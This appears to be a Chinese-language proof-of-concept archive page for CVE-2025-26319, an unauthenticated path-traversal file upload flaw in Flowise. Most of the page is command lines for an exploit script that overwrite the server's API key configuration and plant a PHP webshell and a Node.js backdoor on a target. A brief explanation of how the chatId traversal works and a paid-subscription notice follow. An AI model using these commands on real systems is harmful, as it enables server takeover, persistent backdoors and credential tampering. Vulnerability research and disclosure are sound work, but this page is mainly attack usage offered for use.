关联漏洞
介绍
# CVE-2025-26319
1. 基本文件上传
python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
2. 上传配置文件
# 修改API密钥配置
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json
3. 自动生成并上传Webshell
# 上传PHP Webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
# 上传Node.js后门
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
攻击原理
利用/api/v1/attachments路由在白名单内,不需要身份验证
通过操纵chatId参数进行路径遍历(../../../)
上传任意文件到服务器文件系统的任意位置
文件快照
[4.0K] /data/pocs/abae892664504abaf6492be32ce8c3b202bb4660
├── [7.8K] CVE-2025-26319_exp.py
└── [ 768] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →